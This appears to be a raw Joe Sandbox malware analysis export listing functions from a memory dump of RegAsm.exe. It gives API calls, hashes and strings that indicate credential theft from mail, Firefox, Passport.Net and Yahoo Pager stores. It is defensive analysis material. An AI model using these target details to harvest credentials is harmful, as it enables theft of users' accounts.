                                                                                                                                              • Opcode ID: ac10a7bfd6aa15ede9b4e30c5e41de0da6501438f2188e8c3f6963eddb478c57
                                                                                                                                              • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                                                              • Opcode Fuzzy Hash: ac10a7bfd6aa15ede9b4e30c5e41de0da6501438f2188e8c3f6963eddb478c57
                                                                                                                                              • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                              • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                              • _strcmpi.MSVCRT ref: 00404536
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _strcmpi$memcpystrlen
                                                                                                                                              • String ID: imap$pop3$smtp
                                                                                                                                              • API String ID: 2025310588-821077329
                                                                                                                                              • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                                                              • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                                                              • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                                                              • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040C02D
                                                                                                                                                • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                                                • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                                                • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                                                • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                                                • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                              • API String ID: 2726666094-3614832568
                                                                                                                                              • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                                                              • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                                                              • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                                                              • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00403A88
                                                                                                                                              • memset.MSVCRT ref: 00403AA1
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                                                                                                              • strlen.MSVCRT ref: 00403AE9
                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1786725549-0
                                                                                                                                              • Opcode ID: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                                                                              • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                                                                                                                              • Opcode Fuzzy Hash: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                                                                              • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                                                                                                                              APIs
                                                                                                                                              • memcmp.MSVCRT ref: 00406151
                                                                                                                                                • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                                                                                                                                                • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                                                                • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                                                              • memcmp.MSVCRT ref: 0040617C
                                                                                                                                              • memcmp.MSVCRT ref: 004061A4
                                                                                                                                              • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcmp$memcpy
                                                                                                                                              • String ID: global-salt$password-check
                                                                                                                                              • API String ID: 231171946-3927197501
                                                                                                                                              • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                              • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                                                              • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                              • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                                                              APIs
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 613200358-0
                                                                                                                                              • Opcode ID: c740e99957d3823e1ca2a26bbc78dd8b4854877f08f504732b6d9e79513b28b3
                                                                                                                                              • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                                                              • Opcode Fuzzy Hash: c740e99957d3823e1ca2a26bbc78dd8b4854877f08f504732b6d9e79513b28b3
                                                                                                                                              • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                                                              APIs
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                                                              • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                                                              • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                                                              • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                                                              • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                                                              • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 19018683-0
                                                                                                                                              • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                              • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                                                              • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                              • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040644F
                                                                                                                                              • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                              • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                                                                • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                              • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                                                              • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                                                              • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                                                              • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                                                                • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 438689982-0
                                                                                                                                              • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                              • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                                                              • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                              • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0044495F
                                                                                                                                              • memset.MSVCRT ref: 00444978
                                                                                                                                              • memset.MSVCRT ref: 0044498C
                                                                                                                                                • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                              • strlen.MSVCRT ref: 004449A8
                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                                                                                                              • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                                                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                              • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                                                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpymemset$strlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2142929671-0
                                                                                                                                              • Opcode ID: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                                                                                                              • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                                                                                                              • Opcode Fuzzy Hash: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                                                                                                              • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                                • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                                                              • strlen.MSVCRT ref: 0040F7BE
                                                                                                                                              • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                                                              • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                              • String ID: Passport.Net\*
                                                                                                                                              • API String ID: 2053021465-3671122194
                                                                                                                                              • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                                                                              • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                                                                              • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                                                                              • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                                                              • memset.MSVCRT ref: 0040330B
                                                                                                                                              • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                                                              • strchr.MSVCRT ref: 0040335A
                                                                                                                                                • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                                                              • strlen.MSVCRT ref: 0040339C
                                                                                                                                                • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                              • String ID: Personalities
                                                                                                                                              • API String ID: 2103853322-4287407858
                                                                                                                                              • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                                                                              • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                                                              • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                                                                              • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00444573
                                                                                                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseOpenQueryValuememset
                                                                                                                                              • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                              • API String ID: 1830152886-1703613266
                                                                                                                                              • Opcode ID: 92186b2843cb95c86930638de19930e82a7f4a8b6566e79db89fa237099746d1
                                                                                                                                              • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                                                              • Opcode Fuzzy Hash: 92186b2843cb95c86930638de19930e82a7f4a8b6566e79db89fa237099746d1
                                                                                                                                              • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLastMessagesprintf
                                                                                                                                              • String ID: Error$Error %d: %s
                                                                                                                                              • API String ID: 1670431679-1552265934
                                                                                                                                              • Opcode ID: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                                                                              • Instruction ID: a7eabb7ac59324d00fe13b249bdc4a7432a02f94c8438c44d3dfd779c6ab1540
                                                                                                                                              • Opcode Fuzzy Hash: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                                                                              • Instruction Fuzzy Hash: AEF0A77A8001086BDB10A7A4DC05FA676BCBB44344F1500B6B945F2151EA74DA058F98
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0043DFC5
                                                                                                                                              • memset.MSVCRT ref: 0043DFFE
                                                                                                                                              • memcpy.MSVCRT(00000001,B2850F59,00000000,?,00000001,00000000), ref: 0043E27C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$memcpy
                                                                                                                                              • String ID: $no query solution
                                                                                                                                              • API String ID: 368790112-326442043
                                                                                                                                              • Opcode ID: f59ee7c535991b4e4c1e2cd699b4550ba87100c19ab38750288448e459f31128
                                                                                                                                              • Instruction ID: 13ed0bad29dc8f20330308844ce1f2220340576076c9bd20db88b336710dfa55
                                                                                                                                              • Opcode Fuzzy Hash: f59ee7c535991b4e4c1e2cd699b4550ba87100c19ab38750288448e459f31128
                                                                                                                                              • Instruction Fuzzy Hash: 46128A75D01619DFCB24CF9AC481AAEB7F1FF08314F14916EE895AB391D338A981CB58
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                                                                                              • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                                                                                              • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy
                                                                                                                                              • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                              • API String ID: 3510742995-272990098
                                                                                                                                              • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                                              • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                                                                                                                              • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                                              • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset
                                                                                                                                              • String ID: H
                                                                                                                                              • API String ID: 2221118986-2852464175
                                                                                                                                              • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                              • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                                                              • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                              • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy
                                                                                                                                              • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                              • API String ID: 3510742995-3170954634
                                                                                                                                              • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                              • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                                                                              • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                              • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
                                                                                                                                              • memcmp.MSVCRT ref: 0041DBAE
                                                                                                                                              • memcmp.MSVCRT ref: 0041DBDB
                                                                                                                                              • memcmp.MSVCRT ref: 0041DC47
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcmp$memcpy
                                                                                                                                              • String ID: @ $SQLite format 3
                                                                                                                                              • API String ID: 231171946-3708268960
                                                                                                                                              • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                                              • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                                                                                                                              • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                                              • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                              • String ID: winWrite1$winWrite2
                                                                                                                                              • API String ID: 438689982-3457389245
                                                                                                                                              • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                              • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                                                              • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                              • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpymemset
                                                                                                                                              • String ID: winRead
